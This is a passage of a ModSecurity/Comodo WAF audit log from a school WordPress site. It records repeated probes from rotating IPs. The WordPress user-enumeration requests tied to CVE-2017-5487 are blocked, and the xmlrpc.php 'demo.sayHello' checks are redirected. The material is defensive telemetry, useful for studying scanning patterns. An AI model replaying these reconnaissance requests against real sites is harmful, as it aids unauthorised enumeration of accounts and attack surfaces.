smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4ad365a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4ad365a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463522721260 2575 (- - -) Stopwatch2: 1746463522721260 2575; combined=1396, p1=456, p2=909, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4ad365a-Z-- --55c32270-A-- [05/May/2025:23:45:25 +0700] aBjrJfZJDMuQndL03JNi1gAAAFM 103.236.140.4 38428 103.236.140.4 8181 --55c32270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55c32270-C-- demo.sayHello --55c32270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55c32270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463525464712 5318 (- - -) Stopwatch2: 1746463525464712 5318; combined=4076, p1=519, p2=3334, p3=32, p4=35, p5=92, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55c32270-Z-- --980c392f-A-- [05/May/2025:23:46:12 +0700] aBjrVE2V_h1VFAgsfgaCfgAAAAo 103.236.140.4 38840 103.236.140.4 8181 --980c392f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --980c392f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --980c392f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463572334489 2544 (- - -) Stopwatch2: 1746463572334489 2544; combined=1338, p1=445, p2=858, p3=0, p4=0, p5=35, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --980c392f-Z-- --7cd9ca5e-A-- [05/May/2025:23:46:15 +0700] aBjrVwRwKNFSM6B7_LalEgAAAIM 103.236.140.4 38876 103.236.140.4 8181 --7cd9ca5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cd9ca5e-C-- demo.sayHello --7cd9ca5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cd9ca5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463575057943 5905 (- - -) Stopwatch2: 1746463575057943 5905; combined=4327, p1=555, p2=3526, p3=67, p4=38, p5=83, sr=94, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cd9ca5e-Z-- --7e73cc5d-A-- [05/May/2025:23:47:01 +0700] aBjrhQRwKNFSM6B7_LalKQAAAIw 103.236.140.4 39298 103.236.140.4 8181 --7e73cc5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e73cc5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e73cc5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463621196366 2746 (- - -) Stopwatch2: 1746463621196366 2746; combined=1417, p1=458, p2=928, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e73cc5d-Z-- --587cce1b-A-- [05/May/2025:23:47:02 +0700] aBjrhvZJDMuQndL03JNjgwAAAFI 103.236.140.4 39322 103.236.140.4 8181 --587cce1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --587cce1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --587cce1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463622346791 2378 (- - -) Stopwatch2: 1746463622346791 2378; combined=1260, p1=460, p2=771, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --587cce1b-Z-- --37870b6d-A-- [05/May/2025:23:47:03 +0700] aBjrh02V_h1VFAgsfgaChAAAABA 103.236.140.4 39348 103.236.140.4 8181 --37870b6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37870b6d-C-- demo.sayHello --37870b6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37870b6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463623922957 5247 (- - -) Stopwatch2: 1746463623922957 5247; combined=4216, p1=544, p2=3457, p3=29, p4=31, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37870b6d-Z-- --8c515237-A-- [05/May/2025:23:47:05 +0700] aBjrifZJDMuQndL03JNjjAAAAE8 103.236.140.4 39370 103.236.140.4 8181 --8c515237-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c515237-C-- demo.sayHello --8c515237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c515237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463625099880 5160 (- - -) Stopwatch2: 1746463625099880 5160; combined=4223, p1=516, p2=3487, p3=33, p4=34, p5=91, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c515237-Z-- --11551873-A-- [05/May/2025:23:49:35 +0700] aBjsH_ZJDMuQndL03JNj_QAAAFc 103.236.140.4 40922 103.236.140.4 8181 --11551873-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --11551873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11551873-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463775920363 2967 (- - -) Stopwatch2: 1746463775920363 2967; combined=1471, p1=475, p2=963, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11551873-Z-- --77ab1f7c-A-- [05/May/2025:23:49:38 +0700] aBjsIvZJDMuQndL03JNkAAAAAE0 103.236.140.4 40958 103.236.140.4 8181 --77ab1f7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77ab1f7c-C-- demo.sayHello --77ab1f7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77ab1f7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463778958808 5521 (- - -) Stopwatch2: 1746463778958808 5521; combined=4211, p1=566, p2=3420, p3=32, p4=35, p5=94, sr=82, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77ab1f7c-Z-- --b37bb97b-A-- [05/May/2025:23:49:53 +0700] aBjsMfZJDMuQndL03JNkCAAAAEo 103.236.140.4 41062 103.236.140.4 8181 --b37bb97b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b37bb97b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b37bb97b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463793259648 2299 (- - -) Stopwatch2: 1746463793259648 2299; combined=1253, p1=398, p2=826, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b37bb97b-Z-- --5a662107-A-- [05/May/2025:23:49:56 +0700] aBjsNIZWvR7-42f6JrASDwAAAMo 103.236.140.4 41086 103.236.140.4 8181 --5a662107-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5a662107-C-- demo.sayHello --5a662107-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a662107-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463796104425 5838 (- - -) Stopwatch2: 1746463796104425 5838; combined=4258, p1=525, p2=3500, p3=31, p4=35, p5=98, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a662107-Z-- --e09e4b11-A-- [05/May/2025:23:50:01 +0700] aBjsOU2V_h1VFAgsfgaC9wAAABM 103.236.140.4 41142 103.236.140.4 8181 --e09e4b11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e09e4b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e09e4b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463801294151 3096 (- - -) Stopwatch2: 1746463801294151 3096; combined=1463, p1=474, p2=956, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e09e4b11-Z-- --774a212a-A-- [05/May/2025:23:50:04 +0700] aBjsPPZJDMuQndL03JNkDgAAAEg 103.236.140.4 41174 103.236.140.4 8181 --774a212a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.226 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --774a212a-C-- demo.sayHello --774a212a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --774a212a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463804356783 5608 (- - -) Stopwatch2: 1746463804356783 5608; combined=4119, p1=531, p2=3370, p3=32, p4=34, p5=90, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --774a212a-Z-- --1a1afd0f-A-- [05/May/2025:23:50:09 +0700] aBjsQU2V_h1VFAgsfgaC_QAAAA8 103.236.140.4 41214 103.236.140.4 8181 --1a1afd0f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1a1afd0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1afd0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463809521034 2703 (- - -) Stopwatch2: 1746463809521034 2703; combined=1221, p1=424, p2=769, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1afd0f-Z-- --09fe9f4d-A-- [05/May/2025:23:50:12 +0700] aBjsRPZJDMuQndL03JNkFgAAAEo 103.236.140.4 41234 103.236.140.4 8181 --09fe9f4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --09fe9f4d-C-- demo.sayHello --09fe9f4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --09fe9f4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463812442292 5800 (- - -) Stopwatch2: 1746463812442292 5800; combined=4278, p1=519, p2=3530, p3=31, p4=36, p5=96, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09fe9f4d-Z-- --957cdb34-A-- [05/May/2025:23:50:29 +0700] aBjsVU2V_h1VFAgsfgaDHwAAAA0 103.236.140.4 41378 103.236.140.4 8181 --957cdb34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --957cdb34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --957cdb34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463829845965 3012 (- - -) Stopwatch2: 1746463829845965 3012; combined=1332, p1=425, p2=879, p3=0, p4=0, p5=28, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --957cdb34-Z-- --1dfd9d73-A-- [05/May/2025:23:50:32 +0700] aBjsWARwKNFSM6B7_Lal8gAAAI4 103.236.140.4 41414 